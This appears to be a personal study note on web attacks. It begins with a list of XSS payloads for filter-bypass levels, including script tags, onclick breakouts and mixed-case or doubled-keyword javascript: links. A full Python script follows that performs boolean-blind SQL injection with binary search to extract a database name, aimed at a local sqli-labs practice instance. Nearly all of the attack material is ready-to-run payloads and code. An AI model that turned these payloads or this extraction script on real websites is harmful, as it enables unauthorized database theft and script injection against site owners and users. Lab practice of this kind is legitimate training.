sql注入
?
?/level1.php?name=<script>alert(1)</script>
?
?
?"><script>alert(1)</script>
?
?
?'οnclick='alert(1)
?
?
?" οnclick="alert(1)
?
?
?"><a href="javascript:alert(1)">
?
?
?
?"><a HrEf="javascript:alert(1)">
?
?
?
?"><scscriptript>alert(1)</sscriptcript>
?
?
?HTML字符實體轉換,網頁字符實體編碼 https://www.qqxiuzi.cn/bianma/zifushiti.php
javascript:alert(1)
?
Python二分查找
import sys
import time

import requests

# 配置信息
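# Boolean-blind extraction of the current database name from the local
# sqli-labs Less-8 exercise: every digit/character is recovered with a binary
# search over ">" / "<" / "=" probes, where a TRUE page shows SUCCESS_MESSAGE.
BASE_URL = "http://127.0.0.1/range/sqli-labs/Less-8/"  # local lab instance only
SUCCESS_MESSAGE = "You are in..........."  # marker rendered when the condition is true
CHARSET = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_!@#$%^&*()-+=`~[]{}|;:\",./<>?'  # unused here; kept for compatibility
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Connection': 'keep-alive',
}
TIMEOUT = 5  # request timeout (seconds)
DELAY = 0.1  # pause between requests (seconds)


def send_payload(payload):
    """Send one probe and report whether the page shows the success marker.

    Args:
        payload: The raw value interpolated into the ``id`` query parameter.

    Returns:
        True when SUCCESS_MESSAGE appears in the response body; False for a
        negative page or for any network error (the error is printed, not
        raised, so a single timeout does not abort the whole run).
    """
    # The payload is interpolated verbatim; routing it through ``params=`` would
    # percent-encode it and change what the lab server receives.
    url = f"{BASE_URL}?id={payload}"
    try:
        response = requests.get(url, headers=HEADERS, timeout=TIMEOUT)
    except requests.RequestException as e:
        print(f"請求異常: {e}")
        return False
    finally:
        time.sleep(DELAY)  # throttle, whether or not the request succeeded
    return SUCCESS_MESSAGE in response.text


def binary_search(min_val, max_val, payload_template, char_mode=False, probe=None):
    """Locate an integer in [min_val, max_val] using boolean comparisons.

    ``payload_template`` must contain ``{operator}`` and ``{value}`` placeholders.
    Each step formats it with ``>``/``<``/``=`` and the midpoint and asks the
    oracle whether the condition holds. The value placed in the payload is
    always the integer midpoint (the SQL templates wrap the byte in ascii()),
    which is also what the original code should have done in char_mode.

    Args:
        min_val: Inclusive lower bound (int).
        max_val: Inclusive upper bound (int).
        payload_template: str.format template with ``{operator}``/``{value}``.
        char_mode: When True the bounds are ASCII codes and the match is
            returned as a one-character str via chr().
        probe: Oracle callable ``(payload) -> bool``; defaults to
            send_payload (live HTTP). Injectable for offline tests.

    Returns:
        The matching value (int, or str when char_mode), or None when no
        value in the range satisfies the oracle — including the case where
        every probe answers False, which would otherwise be mistaken for
        equality.
    """
    ask = send_payload if probe is None else probe
    left, right = min_val, max_val
    while left <= right:
        mid = (left + right) // 2
        if ask(payload_template.format(operator='>', value=mid)):
            left = mid + 1
        elif ask(payload_template.format(operator='<', value=mid)):
            right = mid - 1
        elif ask(payload_template.format(operator='=', value=mid)):
            # Two False answers alone are also what a failed request or a
            # broken query produce, so equality is confirmed explicitly.
            return chr(mid) if char_mode else mid
        else:
            return None
    return None


def get_length_digits_count():
    """Return how many decimal digits the database-name length has (0-9), or None."""
    print("[+] 正在獲取數據庫名長度的位數...")
    payload_template = "1' and if(substr(length(length(database())), 1, 1){operator}{value}, 1, 0)--+"
    return binary_search(0, 9, payload_template)


def get_database_length(digits_count):
    """Recover the database-name length one decimal digit at a time.

    Args:
        digits_count: Number of digits in the length, from
            get_length_digits_count(). None or a non-positive count yields
            None instead of int('') raising.

    Returns:
        The length as an int, or None when any digit could not be recovered.
    """
    print(f"[+] 數據庫名長度的位數: {digits_count}")
    print("[+] 正在獲取數據庫名長度...")
    if digits_count is None or digits_count <= 0:
        return None
    digits = []
    for i in range(1, digits_count + 1):
        payload_template = f"1' and if(substr(length(database()), {i}, 1){{operator}}{{value}}, 1, 0)--+"
        digit = binary_search(0, 9, payload_template)
        if digit is None:
            print(f"[-] 獲取第 {i} 位長度失敗")
            return None
        digits.append(str(digit))
        print(f"[*] 已獲取長度第 {i}/{digits_count} 位: {digit}")
    return int("".join(digits))


def get_database_name(length):
    """Recover the database name one character at a time.

    Args:
        length: Number of characters to recover, from get_database_length().

    Returns:
        The recovered name. A position that could not be resolved is
        rendered as '?' so the remaining positions are still reported.
    """
    print(f"[+] 數據庫名長度: {length}")
    print("[+] 正在獲取數據庫名...")
    chars = []
    for i in range(1, length + 1):
        payload_template = f"1' and if(ascii(substr(database(), {i}, 1)){{operator}}{{value}}, 1, 0)--+"
        # Printable ASCII 32..126; char_mode hands back the character itself.
        char = binary_search(32, 126, payload_template, char_mode=True)
        if char is None:
            print(f"[-] 獲取第 {i} 個字符失敗")
            char = '?'
            char_code = None
        else:
            char_code = ord(char)
        chars.append(char)
        print(f"[*] 已獲取字符 {i}/{length}: {char} ({char_code})")
    return "".join(chars)


if __name__ == '__main__':
    try:
        digits_count = get_length_digits_count()
        if digits_count is None:
            print("[-] 獲取數據庫名長度的位數失敗")
            sys.exit(1)
        db_length = get_database_length(digits_count)
        if db_length is None:
            print("[-] 獲取數據庫名長度失敗")
            sys.exit(1)
        db_name = get_database_name(db_length)
        print(f"\n[+] 數據庫名獲取完成: {db_name}")
        print(f"[+] 數據庫名長度: {db_length}")
    except KeyboardInterrupt:
        print("\n[-] 用戶中斷")
        sys.exit(1)
    except Exception as e:
        # Top-level boundary: report and exit non-zero (SystemExit passes through).
        print(f"[-] 發生錯誤: {e}")
        sys.exit(1)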